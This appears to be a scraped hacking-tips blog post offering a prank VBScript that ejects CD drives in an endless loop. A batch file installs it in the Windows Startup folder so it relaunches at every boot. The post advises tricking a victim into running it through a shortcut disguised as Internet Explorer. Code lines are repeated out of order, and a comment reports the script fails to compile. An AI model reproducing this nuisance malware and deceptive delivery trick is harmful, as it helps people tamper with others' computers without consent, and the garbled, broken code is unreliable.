Cd drive hack
Here we will show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part
set wmp = createObject(“wmplayer.ocx.7″)
set drives = wmp.cdromCollection
sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count – 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better… so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.
1:)copy CDfun.vbs “c:\Documents and Settings\%username%\Start Menu\Programs\Startup\”
2:)CDfun.vbs
Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called “internet Explorer” and right click to change properties on icon. that way it will look just like Internet Explorer.
How to stop This Thing???
open
task Manager > processes> wscript.exe
right click on it > end process tree.
done.
set drives = wmp.cdromCollection
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count – 1
drives.item(i).eject()
next
end if
loop
end sub
2:)CDfun.vbs
open
task Manager > processes> wscript.exe
right click on it > end process tree.
Comments
You May Also Like To Read:
- Hack Rediff Bol Via Web Page (Source Code)
- Internet Explorer Hot Keys
- Another Trick for Orkut account hack
- HACK A PC BY USB
- Airtel Hack 2010 – 100% working and Tested!!!!
- Microsoft Office Hack
- Remove The New Autorun.inf Infection Mannualy..
- Another XP Admin Password Hack
- Mobile Hack Tool 2.10 Ultimate
- Hack your Friends computer









Hey your first code giving this error
line: 1
char: 43
error: unterminated string constant
code: 800A0409
source: Ms VBscrip compilation error
NO MAN ITS WORKING IN MY OS TRY AGAIN
no result.
MR.Abhimanyu sharma
WHICH O.S are u using?
X.P. SERVICE PACK 2 AND IT IS FULLY UPDATED